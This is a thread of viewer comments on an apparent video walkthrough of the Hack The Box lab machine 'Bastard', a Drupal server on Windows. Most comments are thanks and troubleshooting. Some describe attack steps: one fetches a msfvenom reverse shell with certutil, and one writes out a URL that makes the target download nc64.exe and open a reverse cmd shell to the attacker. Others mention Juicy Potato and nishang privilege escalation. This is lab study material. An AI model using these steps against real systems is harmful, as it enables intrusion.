My God Ipp one again you outdone yourself. Once again the greatest info sec vid i ever seen. Thanks a thousand time. so explanatory and clear. IM so gratefull. . Keep it up its so appreciated that u share and teach !

What a master. It's a pleasure to see you speak through your process.Thanks for putting these vids up.

for anyone that get the wierd error from the php script 'apt install curl-php'

Your a modern wonder man, I'm so happy you make these videos, your insight into operating systems is truly amazing keep up the good work xx =^.^=

if anyone is having issues with the PHP exploit while using PHP version 7.3.8 update it too 7.4 and reinstall php-curl and it should run without the curl_init error.

I used the PHP exploit with the OS shell, downloaded a msfvenom reverse TCP shell.exe with certutil, and then executed a reverse shell - but I'm sure you wanted to show other techniques with Burp and web shells - which I found very useful to learn about! Great video! Thanks!

Excellent job you are doing bro! Thanks for sharing!

This one is kinda difficult in my case. If I don't have your tutorial, that exploit is not working for me. I wonder what level of difficulty is this machine? If it is just average box, I think I am far away from a pen tester now.

"ch ch ch ch ch chhhhhhhh.." last few month live with that sound :)

Thank you IppSec for such an in depth video! i am stuck only on one part in the video...i had no issues with any of other sripts upload or techniques, but for some reason not able to upload nc64.exe to the target: i've tired the following: 1. Kali:/path/where/nc64exe/is/directory: #python -m SimpleHTTPServer 8000 2. kali:/second/terminal/window:#nc -lvnp 8081 3. Kali:10.10.10.9/cybersec.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.x.x 8081 am I missing anything?

Thanks for this video - I learned quite a bit!

The great course

i get this error when executing the code, everything is right... PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /drupal.php:265 Stack trace: #0 /drupal.php(115): Browser->post('application/vnd...', 'a:2:{s:8:"usern...') #1 {main} thrown in /drupal.php on line 265

Well you could have used powershell for file upload (no need for php uploader). Great video though, explaining other angles :) Also filed issue here github.com/rasta-mouse/Sherlock/issues/5

29:55 How can you enter the path of the nc64.exe like that and still works ? How does the php file knows the location of the executable on your disk

why are all these windows servers with greek locale ? Greeks making these kind of boxes ?

incerdible how much your production has increased over the years. Awesome that you've been making content this long.

Get 500 - Internal server error when checking to see once the ippsec.php file is written via the drupal.php script.

There's actually a simpler way to privesc on this box, if you do whoami /all you will see you have SeImpersonatePrivilege enabled which would allow you to execute Juicy potato, takes like 5 minutes.

searchsploit -m 4449 --> shell Thank you very mutch sir.

I'm studying for my OSCP exam and your work is helping a lot. Thank you. I really mean it. Took me 5 hours to reproduce the steps you went through in this video and I must admit this machine killed me. I definitely have to try harder. Keep up the good work. Now for my italian fellows: Se qualcuno ha voglia di fare un gruppetto di studio per scambiarsi esperienze, opinioni e consigli si faccia pure sentire! Ciao!!

i want to know which keyboard are you using?!

any idea why i am seeing "no socket" when i goto 10.10.10.9. No image, nothing, just no socket written. :/

I get a random error on line 24 but I didn't even touch that code php 41564.php PHP Parse error: syntax error, unexpected 'error_reporting' (T_STRING) in /root/Documents/htb/boxes/Bastard/41564.php on line 24 and line 24 is error_reporting(E_ALL);

Awesome thank you,

i only managed user. Thanks for this

excellent video :) well explained, I got struck in this machine and after vacation seems like it has been retired.... :) I was able to find till end point and could not get the admin user created thru ambionics script..... Could you shed light on why you used 127.0.0.1 instead of the ipaddress of Bas____ please....

Awesome video. Thx a lot - KNX

Hi, just a question, why we need to type: “ | powershell -noprofile - “ ?

hello dear, i will like to know why in PowerUp.ps1 file you add Invoke-AllChecks in the end of the file

I love you.

As always, A-MAY-ZING! Thanks!

thanks man !! that was pain for me to crack it alone !

@IppSec I am just wondering did you fix the exploit before you started recording? When I ran the exploit I had to fix the "curl_init()" function.

Great Walkthrough!

just freaking awesome

any particular reason you dont use your shell for uploading PowerUp?

would you make another videos for windows machines ?

I am not able to privesc in this machine ...EXE s are not running ...tried nc64.exe ..not worring ...used nishang to get a powershell reverse shell ... in that also no exe is running ...i tried both 64 and 32 version of it ... PS C:\inetpub\drupal-7.54> Invoke-PowerShellTcp : Program 'ssec.exe' failed to execute: This version of %1 is not compatible with the version of Windows you're running. Check your compu ter's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher Any help is appreciated thanks

Hey what's up @ipsec